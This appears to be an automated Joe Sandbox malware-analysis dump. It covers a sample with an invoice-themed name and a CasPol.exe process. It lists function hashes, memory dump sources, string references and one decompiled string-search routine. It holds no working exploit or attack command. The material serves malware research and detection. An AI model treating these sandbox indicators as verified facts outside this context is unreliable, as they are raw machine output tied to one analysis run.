Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Uniqueness

Uniqueness Score: -1.00%

Function 00405CB6 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CB6(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405cc6
0x00405cc8
0x00405ccb
0x00405cf7
0x00405cd0
0x00405cd9
0x00405cde
0x00405ce9
0x00405cec
0x00405d08
0x00405cee
0x00405cf5
0x00000000
0x00405cf5
0x00405d01
0x00405d05
0x00405d05
0x00405cff
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC6
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CDE
CharNextA.USER32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF8

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: 3ccce89ec89fcd17ace6fe24ed26798b8253689363ac01c92f586b0f3661b096
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 81F0F631204958FFC7029FA8DD04D9FBBA8EF16354B2540BAE840F7211D634EE01ABA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 6576, Parent PID: 8312COMMON

Executed Functions

Function 341920D8 Relevance: 7.1, Strings: 5, Instructions: 835COMMON

Download Yara Rule

Strings

Xq, xrefs: 34192196
Xq, xrefs: 341933DE
Xq, xrefs: 341921D0
Xq, xrefs: 3419224F
Xq, xrefs: 3419229C

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq$Xq
API String ID: 0-2737156015
Opcode ID: 1dbf286e5e0125c50867c560e770a467a75498a76dd7a9063691c89cbd6c02c6
Instruction ID: 7855beecf68630a8d3ec41a2d49447d9e421f6f57c9493262e79b75e7fff769b
Opcode Fuzzy Hash: 1dbf286e5e0125c50867c560e770a467a75498a76dd7a9063691c89cbd6c02c6
Instruction Fuzzy Hash: 4A62BFB5905725ABDB125FB4D0C81CEBBE1AF46F08F2644A9D0C49F569D732920BCBC2

Uniqueness

Uniqueness Score: -1.00%

Function 341934F2 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

Xq, xrefs: 3419352F

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID: Xq
API String ID: 0-599127549
Opcode ID: 7cb745e80075a76251f20395d5ab9a7f7b891e2dbcf028bc3d4365604753a234
Instruction ID: 255cc38ed1d3bebff4927b5f6d9ff4e2037c50b08caf2d1e7f792d7d67c54b89
Opcode Fuzzy Hash: 7cb745e80075a76251f20395d5ab9a7f7b891e2dbcf028bc3d4365604753a234
Instruction Fuzzy Hash: DEF15C78E007189FEB08DFB9C4946AEBBF2BF88700B548569D446EB354DF349846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 34196DDF Relevance: .7, Instructions: 689COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3cf8962ae542083f2feaaca965bceda9112d4511e9d370057c8175dda31b73
Instruction ID: f3c949363b20b331ea9a9c18c1fc07f6743365bde11ec9a7abd9753a04f25243
Opcode Fuzzy Hash: fb3cf8962ae542083f2feaaca965bceda9112d4511e9d370057c8175dda31b73
Instruction Fuzzy Hash: EB62AE75E11228CFEB64DF69C894BD9BBF2BF89301F1481A9D418A7255DB309E81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 34194858 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 684e7c4d4633acc40d8c584a1aaf442585ae52870d3f6b780cf6bb23be314d72
Instruction ID: 98068777c37775f9f2e87dcf8cc5efa9decde13f7708235d39dad0aa02ecc386
Opcode Fuzzy Hash: 684e7c4d4633acc40d8c584a1aaf442585ae52870d3f6b780cf6bb23be314d72
Instruction Fuzzy Hash: 7C518575E01608DFDB54CFA9D994A9DBBF2BF89300F248169E815AB364DB30A901CF50

Uniqueness

Uniqueness Score: -1.00%

Function 34191EE8 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Ph"4, xrefs: 34191F46

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID: Ph"4
API String ID: 0-713816243
Opcode ID: a045d4049134df01a9baa6eef50826dbc35d64516ed137c7f93649c8a2cc76a8
Instruction ID: ce4f37aebd1abba68fcbc0129e98ffe7d9caccc5187443089e434257a22331a8
Opcode Fuzzy Hash: a045d4049134df01a9baa6eef50826dbc35d64516ed137c7f93649c8a2cc76a8
Instruction Fuzzy Hash: F621EDB4D0560D8FCB40EFB9C9845EEBBF0FB49200F00456AD805B2210EB305A9ACBA5

Uniqueness

Uniqueness Score: -1.00%

Function 34190C91 Relevance: .4, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53215967183ee4adbd910398461d2783925040a0e586f985bdc027bc1e3a8f78
Instruction ID: 13269fe9e096b6993d368d09396339fb8715ef456544f2738711a24e2b56e50f
Opcode Fuzzy Hash: 53215967183ee4adbd910398461d2783925040a0e586f985bdc027bc1e3a8f78
Instruction Fuzzy Hash: DE22E474920219CFDB54DFA4D8A4A9DBBB2FF48301F1085A9D419B7394DB706E92CF90

Uniqueness

Uniqueness Score: -1.00%

Function 34190CA0 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 007279056def890cba4829a5073d3ed8c293528f73f031a0b400da821f6bbc8f
Instruction ID: c3f96cb2af6e461d4b4515a68cca5074153a844c29385c5d235ac43f179c900a
Opcode Fuzzy Hash: 007279056def890cba4829a5073d3ed8c293528f73f031a0b400da821f6bbc8f
Instruction Fuzzy Hash: 5912F474920219CFDB54DFA4D8A8A9DBBB2FF48301F1085A9D419B7394DB706E92CF90

Uniqueness

Uniqueness Score: -1.00%

Function 34194CF0 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b5795c4388cde197068b0fbcbe63fa589ff297f43a560ce8b88cfa5bd0e5ae
Instruction ID: 3bfdeefd297da3d79b7f2a6b72824a671a603c3c37c815a313ffd8e9786bcf6c
Opcode Fuzzy Hash: 30b5795c4388cde197068b0fbcbe63fa589ff297f43a560ce8b88cfa5bd0e5ae
Instruction Fuzzy Hash: 8751BC34520A0A9FC7017F76C6BC13EBFA6FB4F3937846C01A11EA1444DF7504A69BA8

Uniqueness

Uniqueness Score: -1.00%

Function 341960AF Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0bd85152aeba18cb1e97f573e5d17d666e50aeb6626f8bf2adb38a7a5987573
Instruction ID: f36563cc0b5379d9f873d3fb6f7ee77743d202f0a3f7f8e55e946c6cb1b2106a
Opcode Fuzzy Hash: a0bd85152aeba18cb1e97f573e5d17d666e50aeb6626f8bf2adb38a7a5987573
Instruction Fuzzy Hash: E051FF74E11218CFEB14CFA5D894BEEBBB2FF88304F608529D405AB2A4DB75594ACF40

Uniqueness

Uniqueness Score: -1.00%

Function 34195507 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a8fe0142e815d1faf6e29c85240aa6a7614455846cf91b005c60731a2ecb10
Instruction ID: 727d3c51d15a7e4aac0ab6f920af3f553efda9629602cc26256f87d3bf1f8f31
Opcode Fuzzy Hash: 68a8fe0142e815d1faf6e29c85240aa6a7614455846cf91b005c60731a2ecb10
Instruction Fuzzy Hash: 47413675E05A18CFEB80CFA9D4846DCBBF6FB49306F619019D018B7249EB709842CF94

Uniqueness

Uniqueness Score: -1.00%

Function 34195F0C Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd6da24b3fd42a088b7dafe4e2123c3a1dcca0c6b5414472b383be6b2a66480e
Instruction ID: 8d714edb36628ebd935a4556e0c37a557e6c332d0642c23cb105871298d9ac38
Opcode Fuzzy Hash: cd6da24b3fd42a088b7dafe4e2123c3a1dcca0c6b5414472b383be6b2a66480e
Instruction Fuzzy Hash: D7410276A15A09CFEB40DFA9D4846DCBBF6BB89311F619019D018B7288DB329842CF94

Uniqueness

Uniqueness Score: -1.00%

Function 341954A7 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91d0bede8832efa321ed8ca7e1e6ce3be54d39b50b29de91dbdf5095d1617e41
Instruction ID: a31be6a3d51e58acc350efb801c4885070e0b7810e43bf0b9c39910494d31cb9
Opcode Fuzzy Hash: 91d0bede8832efa321ed8ca7e1e6ce3be54d39b50b29de91dbdf5095d1617e41
Instruction Fuzzy Hash: 29413771E05618CFEB80CFA9D4846DDBBF6FB49302F209119D418B7288EB749942CF94

Uniqueness

Uniqueness Score: -1.00%

Function 34195EAC Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 126b86df863eea2abe57776711a3574845d262e386fc9b868e95b387e2f84718
Instruction ID: e357f535dfbe9897fce18a0af8bf13252638c1090ae22e4925f8b83df49bbdd4
Opcode Fuzzy Hash: 126b86df863eea2abe57776711a3574845d262e386fc9b868e95b387e2f84718
Instruction Fuzzy Hash: E4410472E05A09CFEB40CFA9D4846DDF7F6BB49315F619159D018B7288DB329842CF94

Uniqueness

Uniqueness Score: -1.00%

Function 34195D60 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d343e564cbec872b52c6733d8ca946a6a4680809c789cfa1ec89e7fe31bcd28
Instruction ID: 677edbae69b9d418221ff34fe7652811c9203a4756ea5fd410807c59088f365f
Opcode Fuzzy Hash: 8d343e564cbec872b52c6733d8ca946a6a4680809c789cfa1ec89e7fe31bcd28
Instruction Fuzzy Hash: 4D3103B2E01A08CBEB44DFAAD4846DDB7F6AB89300F14D029C418B7258DB319942CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 34196EC6 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bafa58916c98cf0c2b01de69e3d93c05c90b0e97888936180378906c53b8aef8
Instruction ID: 2e3f7c68bd86f7609d32c1ce3295442aad62449ebcc05de43612348d47e44225
Opcode Fuzzy Hash: bafa58916c98cf0c2b01de69e3d93c05c90b0e97888936180378906c53b8aef8
Instruction Fuzzy Hash: 2D41AB75A12628CFDB65CF68C890ADDBBB2BB89301F5045E9D409A7360DB319E81CF80

Uniqueness

Uniqueness Score: -1.00%

Function 34195358 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceedf8bf40459cf25674c8dbe13ac03398517a9ec8d6a5886799b4dd7639a72b
Instruction ID: d3de47182ed85ecc273ef0c7be808203212fa428d7dba4d3dd0771872cdc9a92
Opcode Fuzzy Hash: ceedf8bf40459cf25674c8dbe13ac03398517a9ec8d6a5886799b4dd7639a72b
Instruction Fuzzy Hash: E1412771D01608CFEB44DFAAD4846DDBBF2BB89302F50D129D414B7298DB709942CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 34191FE8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 202c5070f7cf07ad118e11134a2907c7cc96c153267a92cb549cf0f1e8275cbc
Instruction ID: 386f83f5b4ed2020ac7d1677e746b0a0eef5a0b3b7942573eb6f7ee344d20bd3
Opcode Fuzzy Hash: 202c5070f7cf07ad118e11134a2907c7cc96c153267a92cb549cf0f1e8275cbc
Instruction Fuzzy Hash: 6D219239A00604AFDB44DF68C4909AEBBB5FF99360B14C569D8199B340DF30EE46CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 33FCD4F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875572017.0000000033FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 33FCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_33fcd000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b641388f118c3a4b18e9a539bf64ee481a22010c50aefffcd50896d81a0223dd
Instruction ID: 8b09a8c8662c496e2e04937e28035d91a360f213648a1c5e239c3404c6436683
Opcode Fuzzy Hash: b641388f118c3a4b18e9a539bf64ee481a22010c50aefffcd50896d81a0223dd
Instruction Fuzzy Hash: AA21D3B6644382DFEB05DF10D9C0B1BBF65EF88318F648D69E8490A247C336D556CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 33FCD404 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875572017.0000000033FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 33FCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_33fcd000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6416d087f03323925545077d4cdd88205e3feadbb55d9ba008a15721fd5fb2f
Instruction ID: 2de17076f01fe0750c192056df6e61a815de89cb0d11b65a9ac7fd7bd8b6b1ab
Opcode Fuzzy Hash: f6416d087f03323925545077d4cdd88205e3feadbb55d9ba008a15721fd5fb2f
Instruction Fuzzy Hash: EF21C176644382EFEB05DF10D9C0F5AFB65EF84324F64C969EA480A246C336E456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 3419396D Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7987656462bcee9a980452fdef90899e72bd97f3d69073ff7abba466f9f25180
Instruction ID: dca89cb7cdf6874e27ad9cb1f0bd841550c1f3ce8dff66c3a688a843c32eaca6
Opcode Fuzzy Hash: 7987656462bcee9a980452fdef90899e72bd97f3d69073ff7abba466f9f25180
Instruction Fuzzy Hash: 1B316278E21308DFDB44DFA9D59499DBBB2FF49301B204469E819AB364DB31AD52CF40

Uniqueness

Uniqueness Score: -1.00%

Function 34195348 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9abb2cdc69561e2b9759c0e4900a4bd6585125be5de4d96ace1328a963047d38
Instruction ID: 0492fcccf89d85168eab4f2c6e8ef41e1ce8eb76aa17c855dbc83dbbb7338c2a
Opcode Fuzzy Hash: 9abb2cdc69561e2b9759c0e4900a4bd6585125be5de4d96ace1328a963047d38
Instruction Fuzzy Hash: CF1156B2D04A449BEB04CFABC5846DEBBF2ABC9301F14D529C418B6258DB704606CF64

Uniqueness

Uniqueness Score: -1.00%

Function 33FCD3FF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875572017.0000000033FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 33FCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_33fcd000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 608f6024f20939c56ce4bc0b3af9e9f8afd3d8b310fabfc23095bf2e03e48f38
Instruction ID: 5c7389f686e168dd95b623138d132b2277b1887bfb9279869c33a273baac9917
Opcode Fuzzy Hash: 608f6024f20939c56ce4bc0b3af9e9f8afd3d8b310fabfc23095bf2e03e48f38
Instruction Fuzzy Hash: CA11AF76544281DFDB05CF10D5C4B4AFF61FF84324F28C5A9E9490B656C33AE456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 33FCD4EB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1875572017.0000000033FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 33FCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_33fcd000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 608f6024f20939c56ce4bc0b3af9e9f8afd3d8b310fabfc23095bf2e03e48f38
Instruction ID: c78b3b2e0f66e897f3e96e2e51ea4dc0384e71125efa4376a230c8859e5b8c75
Opcode Fuzzy Hash: 608f6024f20939c56ce4bc0b3af9e9f8afd3d8b310fabfc23095bf2e03e48f38
Instruction Fuzzy Hash: 1611B176544281CFDB05CF10D5C0B1ABF61FF88314F28C9A9E8490B257C336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 34195BE8 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7bb0601ee1f37d83c1cdcc000f4c3a355cccc3b4b30b90f210430fe3b6c1d83
Instruction ID: c54f76e802302e438760594219ef85c39d552345f22f763e9c9423c671582612
Opcode Fuzzy Hash: d7bb0601ee1f37d83c1cdcc000f4c3a355cccc3b4b30b90f210430fe3b6c1d83
Instruction Fuzzy Hash: E2F03A75B01619DFCB84EF7CC44459E77F8BF0921071145A9D409EB321EB30D9008BD1

Uniqueness

Uniqueness Score: -1.00%

Function 34195CDF Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95b4569ab43f58195d0abf755b600e36fc6ff83ea16a120a2508c547e9435f02
Instruction ID: c30fd49c1b387659b51558931d16149b7d1ba9c4b7306801ce88112209f5de54
Opcode Fuzzy Hash: 95b4569ab43f58195d0abf755b600e36fc6ff83ea16a120a2508c547e9435f02
Instruction Fuzzy Hash: B4F0A031D05748C7EB10DA7ED4482FFBFF1AB8A200F445969C445A314ACB70541ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 34195181 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615db80ceb74401ef612fade33a87a9ee9e385059a3228b80d18b8cd50a68f1a
Instruction ID: 0ac8988b20cf0c04c7e1906fd67f781c5cf53e26b55f3f1edaf37eeba0444eb0
Opcode Fuzzy Hash: 615db80ceb74401ef612fade33a87a9ee9e385059a3228b80d18b8cd50a68f1a
Instruction Fuzzy Hash: 4AF0E532D00604CFD710DE79D4686FEFBF1AB89301F809928D016B314CCB306519CA91

Uniqueness

Uniqueness Score: -1.00%

Function 34191F97 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a241d9d15ad95b08ae74174e1aec8c8df5931bc1c6b084ecf01016a8da9394cf
Instruction ID: ef747e87e66df00e6e80074ba60c3d3428d35f50e26055e84d2f61f58fb38a38
Opcode Fuzzy Hash: a241d9d15ad95b08ae74174e1aec8c8df5931bc1c6b084ecf01016a8da9394cf
Instruction Fuzzy Hash: 37E0D835C21365AFCB029B709C004DEBF34FF83611B4046A3D42127141F770161EC3A1

Uniqueness

Uniqueness Score: -1.00%

Function 341951EC Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 795056720cb5594dab41234fa90f72071c711c4a97f009e2aacfd14e9321332c
Instruction ID: 9129320229a72d47f8f6f13385007c4948adaf7acc1ce4ca7872dcc9c7093e10
Opcode Fuzzy Hash: 795056720cb5594dab41234fa90f72071c711c4a97f009e2aacfd14e9321332c
Instruction Fuzzy Hash: 60E06853D08600CFE7008AA194A10B97FF4D993111F4150D7D004F7429D710820A9741

Uniqueness

Uniqueness Score: -1.00%

Function 34195158 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85c29e69c6b97f81f9c7f9bfaf029ecd38de56469cac91fdfda3ee25e6706e7f
Instruction ID: d5dfc1395a6f103b689831dd74b968675433e34926cc2451f57b0a0bc2e12161
Opcode Fuzzy Hash: 85c29e69c6b97f81f9c7f9bfaf029ecd38de56469cac91fdfda3ee25e6706e7f
Instruction Fuzzy Hash: 3BE0C23285AA04DAD7514A70A8911E8B7B49B83304F4512A6C418A305A97200959D2D2

Uniqueness

Uniqueness Score: -1.00%

Function 34191FA8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1876212799.0000000034190000.00000040.00000800.00020000.00000000.sdmp, Offset: 34190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_34190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
